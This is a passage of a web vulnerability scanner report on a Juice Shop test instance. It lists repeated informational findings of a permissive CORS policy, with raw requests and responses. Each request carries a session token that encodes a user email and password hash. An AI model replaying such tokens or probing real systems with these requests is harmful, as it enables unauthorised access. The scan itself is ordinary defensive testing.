GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://gjjcueddqtdc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:04 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.61. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/jquery/dist/jquery.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://iowuhqohmwcz.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/jquery/dist/jquery.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://iowuhqohmwcz.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:14 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.62. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/moment/min/moment.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lacczymhzxvc.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/moment/min/moment.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://lacczymhzxvc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:29 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.63. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://gqnrsvoacaxg.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://gqnrsvoacaxg.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:34 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.64. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://getmtgxrkthr.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://getmtgxrkthr.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:35 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.65. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://dfxcsinnqyyk.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://dfxcsinnqyyk.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:45 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.66. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/qrcode-generator/js/qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://duwlwjeudoum.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://duwlwjeudoum.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:02 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.67. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/string/dist/string.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://bzvfurwajlux.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/string/dist/string.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://bzvfurwajlux.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:09 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.68. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/underscore/underscore.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vlmwjrlzxnpe.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/underscore/underscore.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vlmwjrlzxnpe.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:10 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.69. http://192.168.61.143:3000/public/images/products/css/app.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/css/app.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://udwfgycclqea.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/css/app.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://udwfgycclqea.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:27 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.70. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/dist/juice-shop.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lzsyblbevkxj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://lzsyblbevkxj.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:21:57 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.71. http://192.168.61.143:3000/redirect
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /redirect

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://guajreddqaln.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /redirect HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://guajreddqaln.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Date: Sun, 15 Jan 2017 21:21:14 GMT
Connection: close
Content-Length: 1923

<html>
<head>
<meta charset='utf-8'>
<title>TypeError: Cannot read property &#39;indexOf&#39; of undefined</title>
<style>* {
margin: 0;
padding: 0;
outline: 0;
}

body {
paddin
...[SNIP]...
2.72. http://192.168.61.143:3000/rest/admin/application-version
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/admin/application-version

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://jdofgaapvhxo.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/admin/application-version HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
